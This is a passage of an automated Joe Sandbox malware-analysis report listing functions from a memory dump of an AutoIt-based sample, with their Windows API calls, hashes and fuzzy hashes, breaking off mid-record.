                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                          • String ID:
                          • API String ID: 2364484715-0
                          • Opcode ID: c1b629f1560f112b0c45cae7fc183dac1ac90ffc8f34300951476d607f133197
                          • Instruction ID: 3ddda50742c035b7215ed110132aa8a01c1151ecbeb0ef71bbec5ce6f89b86b5
                          • Opcode Fuzzy Hash: c1b629f1560f112b0c45cae7fc183dac1ac90ffc8f34300951476d607f133197
                          • Instruction Fuzzy Hash: 5BE04632110209DFCB01EF08EC44EA637A2FB09340F008091FA00676B2CB31ED20EF50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B1AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00B1AF8E
                          • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 00B1ACC7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: DialogLongNtdllProc_Window
                          • String ID:
                          • API String ID: 2065330234-0
                          • Opcode ID: f3672c83ef48e9ea16446ad9af0afe7f305207bc2daaeebe4262993109c201fc
                          • Instruction ID: b5bf34013b0f9ed2abefcc79df9fbf767ac7797fdc9abf47019a859b1247eec7
                          • Opcode Fuzzy Hash: f3672c83ef48e9ea16446ad9af0afe7f305207bc2daaeebe4262993109c201fc
                          • Instruction Fuzzy Hash: 21E0EC36104208FBCF05AF94DC51EA83B66FB49354F508459F6055B6A2CA32E562EB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00B3BA6A), ref: 00B3BEB3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: LogonUser
                          • String ID:
                          • API String ID: 1244722697-0
                          • Opcode ID: 8c267964c90f7d3acf9c84297e1e6aa75523b8b3b89857738e50fe2d7bfb3d7d
                          • Instruction ID: ebf717a0f9f125cf153d56fffd26038e4f8e87a40696f500b1d77cb443f0d8ec
                          • Opcode Fuzzy Hash: 8c267964c90f7d3acf9c84297e1e6aa75523b8b3b89857738e50fe2d7bfb3d7d
                          • Instruction Fuzzy Hash: AFD09E321A464EAEDF025FA4EC06EAE3F6AEB04701F548511FA15D60A1C675D531EB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtdllDialogWndProc_W.NTDLL ref: 00B6F3D0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: DialogNtdllProc_
                          • String ID:
                          • API String ID: 3239928679-0
                          • Opcode ID: 0f0f4e9da0bca11b3d885184ef7d31d2a4528ba5dc28d9107356ffa44477c0b1
                          • Instruction ID: a32c7554d59a01d8a2f25599666e432bd7c013b8bffb99dc6ff456729044ae54
                          • Opcode Fuzzy Hash: 0f0f4e9da0bca11b3d885184ef7d31d2a4528ba5dc28d9107356ffa44477c0b1
                          • Instruction Fuzzy Hash: F9E0E23420420CEFCB01DF88E844E863BA5FB1A350F000055FD048B262CB72A820EBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtdllDialogWndProc_W.NTDLL ref: 00B6F3A1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: DialogNtdllProc_
                          • String ID:
                          • API String ID: 3239928679-0
                          • Opcode ID: 5c0f267a79969eef35bc1fb10c7b7c80905037cb786654e57da0b984aa9eb2b0
                          • Instruction ID: c65b34b7932b0fe3f8a4a16cf5bb6b8c85278380d2be7f8dbf466e5a26f4917f
                          • Opcode Fuzzy Hash: 5c0f267a79969eef35bc1fb10c7b7c80905037cb786654e57da0b984aa9eb2b0
                          • Instruction Fuzzy Hash: 57E0E23420420CEFCB01DF88E844E863BA5FB2A350F000055FD048B262CB71A820DBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B1AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00B1AF8E
                            • Part of subcall function 00B1B86E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00B1B85B), ref: 00B1B926
                            • Part of subcall function 00B1B86E: KillTimer.USER32(00000000,?,00000000,?,?,?,?,00B1B85B,00000000,?,?,00B1AF1E,?,?), ref: 00B1B9BD
                          • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,00B1AF1E,?,?), ref: 00B1B864
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                          • String ID:
                          • API String ID: 2797419724-0
                          • Opcode ID: 80b9e453f8b44ed294a9c21995dc55429cae81751f37f807013273d9eec0f984
                          • Instruction ID: 40a5d2141858ade6161458d1c39153c28356fdab5df63afbc819cadeb352406c
                          • Opcode Fuzzy Hash: 80b9e453f8b44ed294a9c21995dc55429cae81751f37f807013273d9eec0f984
                          • Instruction Fuzzy Hash: 33D0127214430C77DB102BA5DC07F8D3B5DAB11B50F908465F6056A1E28A71B451A555
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00B28E1F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled
                          • String ID:
                          • API String ID: 3192549508-0
                          • Opcode ID: 3fe0a0506907af00c1b4655bd03faca86858759bd9f05f0d64666a47331b207a
                          • Instruction ID: 8d011527b091ece6fe9af7215086ee3b67c79bd104890797d76ddc634a8b879b
                          • Opcode Fuzzy Hash: 3fe0a0506907af00c1b4655bd03faca86858759bd9f05f0d64666a47331b207a
                          • Instruction Fuzzy Hash: 15A0123000050CE78A002B51EC044447F6CD7041507004021F40C010318B3354108685
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                          • Instruction ID: 1ef0da9847abaaa30f2f7162b4ca19404dc9096280931a8c4a157f83919efcf2
                          • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                          • Instruction Fuzzy Hash: B8C1D5722191B349DF2D463D947443EBAE1DAB27B131A0BEDE4BBCB4C1EE24C564D620
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                          • Instruction ID: 498a27f2d4b475b0dd9a5d57a0a2a5b52201f31501c7fd007891933b39da4fee
                          • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                          • Instruction Fuzzy Hash: 9AC1D8722091B34ADF2D463DD47443EBAE19AB27B131A0BEDD4BBCB5C5EE24C524D620
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                          • Instruction ID: c60695eff49035aae44603c203f9b3b69a9e064eb37a9c44dcceebf471f21e89
                          • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                          • Instruction Fuzzy Hash: 2FC1E5722291B349DF2D5639A47443EFAE1DAA27B130A0BEDD4BBCB4C2EE14C564D710
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                          • Instruction ID: 7e5414e9d63d2098ff5fa27e59e66b904c26718d3b70de0c636536d569698dae
                          • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                          • Instruction Fuzzy Hash: 67C1E5722191B349DF1D5639A47443EBBE19EA27B130A07EDD4BBCB4D2EE24D524C720
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • DeleteObject.GDI32(00000000), ref: 00B5A7A5
                          • DeleteObject.GDI32(00000000), ref: 00B5A7B7
                          • DestroyWindow.USER32 ref: 00B5A7C5
                          • GetDesktopWindow.USER32 ref: 00B5A7DF
                          • GetWindowRect.USER32(00000000), ref: 00B5A7E6
                          • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00B5A927
                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00B5A937
                          • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B5A97F
                          • GetClientRect.USER32(00000000,?), ref: 00B5A98B
                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00B5A9C5
                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B5A9E7
                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B5A9FA
                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B5AA05
                          • GlobalFix.KERNEL32(00000000), ref: 00B5AA0E
                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B5AA1D
                          • GlobalUnWire.KERNEL32(00000000), ref: 00B5AA26
                          • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B5AA2D
                          • GlobalFree.KERNEL32(00000000), ref: 00B5AA38
                          • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00B8D9BC,00000000), ref: 00B5AA60
                          • GlobalFree.KERNEL32(00000000), ref: 00B5AA70
                          • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00B5AA96
                          • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00B5AAB5
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B5AAD7
                          • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B5ACC4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Window$Global$Rect$CreateFile$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadMessagePictureReadSendShowSizeWire
                          • String ID: $AutoIt v3$DISPLAY$static
                          • API String ID: 2547915802-2373415609
                          • Opcode ID: d9ce01e86e7a09f9213bcc2dbb97fc38a6bec4c4248955a8861ba1d22d83fa2c
                          • Instruction ID: 0761c02261c46a957063a6a0a332f405a1d91f01a19dba574b474f5e844375e9
                          • Opcode Fuzzy Hash: d9ce01e86e7a09f9213bcc2dbb97fc38a6bec4c4248955a8861ba1d22d83fa2c
                          • Instruction Fuzzy Hash: 09028E71900119EFDB14DF68CC89EAE7BB9FF49310F048699F905AB2A1DB309D41CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SetTextColor.GDI32(?,00000000), ref: 00B6D0EB
                          • GetSysColorBrush.USER32(0000000F), ref: 00B6D11C
                          • GetSysColor.USER32(0000000F), ref: 00B6D128
                          • SetBkColor.GDI32(?,000000FF), ref: 00B6D142
                          • SelectObject.GDI32(?,00000000), ref: 00B6D151
                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00B6D17C
                          • GetSysColor.USER32(00000010), ref: 00B6D184
                          • CreateSolidBrush.GDI32(00000000), ref: 00B6D18B
                          • FrameRect.USER32(?,?,00000000), ref: 00B6D19A
                          • DeleteObject.GDI32(00000000), ref: 00B6D1A1
                          • InflateRect.USER32(?,000000FE,000000FE), ref: 00B6D1EC
                          • FillRect.USER32(?,?,00000000), ref: 00B6D21E
                          • GetWindowLongW.USER32(?,000000F0), ref: 00B6D249
                            • Part of subcall function 00B6D385: GetSysColor.USER32(00000012), ref: 00B6D3BE
                            • Part of subcall function 00B6D385: SetTextColor.GDI32(?,?), ref: 00B6D3C2
                            • Part of subcall function 00B6D385: GetSysColorBrush.USER32(0000000F), ref: 00B6D3D8
                            • Part of subcall function 00B6D385: GetSysColor.USER32(0000000F), ref: 00B6D3E3
                            • Part of subcall function 00B6D385: GetSysColor.USER32(00000011), ref: 00B6D400
                            • Part of subcall function 00B6D385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B6D40E
                            • Part of subcall function 00B6D385: SelectObject.GDI32(?,00000000), ref: 00B6D41F
                            • Part of subcall function 00B6D385: SetBkColor.GDI32(?,00000000), ref: 00B6D428
                            • Part of subcall function 00B6D385: SelectObject.GDI32(?,?), ref: 00B6D435
                            • Part of subcall function 00B6D385: InflateRect.USER32(?,000000FF,000000FF), ref: 00B6D454
                            • Part of subcall function 00B6D385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B6D46B
                            • Part of subcall function 00B6D385: GetWindowLongW.USER32(00000000,000000F0), ref: 00B6D480
                            • Part of subcall function 00B6D385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B6D4A8
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                          • String ID:
                          • API String ID: 3521893082-0
                          • Opcode ID: 709e5018d3c791e4e96d44ecd7b1eb3d7df2454302557650b80030fdd9f4b860
                          • Instruction ID: 2625f49e87346340bd3a882127e2530b585281ed9b0aa60aeb81a838ec0a501a
                          • Opcode Fuzzy Hash: 709e5018d3c791e4e96d44ecd7b1eb3d7df2454302557650b80030fdd9f4b860
                          • Instruction Fuzzy Hash: 6B916B72508301AFDB10AF64DC48E5BBBE9FF89325F100A1AF962A71E0DB75D944CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • DestroyWindow.USER32(00000000), ref: 00B5A42A
                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00B5A4E9
                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00B5A527
                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00B5A539
                          • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00B5A57F
                          • GetClientRect.USER32(00000000,?), ref: 00B5A58B
                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00B5A5CF
                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00B5A5DE
                          • GetStockObject.GDI32(00000011), ref: 00B5A5EE
                          • SelectObject.GDI32(00000000,00000000), ref: 00B5A5F2
                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00B5A602
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B5A60B
                          • DeleteDC.GDI32(00000000), ref: 00B5A614
                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00B5A642
                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 00B5A659
                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00B5A694
                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00B5A6A8
                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 00B5A6B9
                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00B5A6E9
                          • GetStockObject.GDI32(00000011), ref: 00B5A6F4
                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00B5A6FF
                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00B5A709
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                          • API String ID: 2910397461-517079104
                          • Opcode ID: c9a4a02a5ee51f7e30acdbcc1ed5a501eccadf887b82f90a562895c018356d73
                          • Instruction ID: fa8194c5392b06f0923c4c2ba7c901e45eb0dc51d727ab758b411173bb2d46b1
